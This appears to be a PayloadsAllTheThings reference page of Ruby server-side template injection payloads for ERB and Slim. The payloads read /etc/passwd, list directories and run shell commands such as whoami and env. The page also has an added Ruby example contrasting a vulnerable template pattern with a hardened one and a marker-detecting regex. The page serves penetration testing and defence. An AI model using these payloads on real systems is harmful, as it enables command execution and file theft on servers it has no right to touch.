PayloadsAllTheThings/Server Side Template Injection/Ruby.md
2024-10-23 13:59:18 +02:00

Server Side Template Injection - Ruby

Ruby

Ruby - Basic injections

ERB:

<%= 7 * 7 %>

Slim:

#{ 7 * 7 }
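
Why the ERB probe above is a reliable test, as an added example that is not part of the original page: a response containing 49 means the input was compiled as template source rather than treated as data. The method names render_vulnerable, render_safe and suspicious?, and the greeting template, are assumptions made for illustration.

```ruby
require 'erb'

# Constructed input: the arithmetic probe listed on this page.
PROBE = '<%= 7 * 7 %>'

# Vulnerable pattern: user input is concatenated into the template
# source, so ERB compiles and evaluates any tags it contains.
def render_vulnerable(name)
  ERB.new("Hello #{name}!").result(binding)
end

# Hardened pattern: the template source is a fixed string. User input
# is passed only as a value and is HTML-escaped on output, so tags in
# the input are never compiled.
SAFE_TEMPLATE = ERB.new('Hello <%= ERB::Util.html_escape(name) %>!')

def render_safe(name)
  SAFE_TEMPLATE.result_with_hash(name: name)
end

# Detection aid: flag input that carries ERB tag delimiters or
# Ruby/Slim interpolation markers, e.g. for logging or alerting.
# This complements the fixed-template pattern; it does not replace it.
TEMPLATE_MARKERS = /<%|%>|#\{/

def suspicious?(input)
  input.match?(TEMPLATE_MARKERS)
end

if __FILE__ == $PROGRAM_NAME
  puts render_vulnerable(PROBE) # probe is evaluated
  puts render_safe(PROBE)       # probe is rendered as inert text
  puts suspicious?(PROBE)
end
```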

Ruby - Retrieve /etc/passwd

<%= File.open('/etc/passwd').read %>

Ruby - List files and directories

<%= Dir.entries('/') %>

Ruby - Code execution

Execute code using SSTI for the ERB engine.

<%= system('cat /etc/passwd') %>
<%= `ls /` %>
<%= IO.popen('ls /').readlines()  %>
<% require  'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>

Execute code using SSTI for the Slim engine.

#{ %x|env| }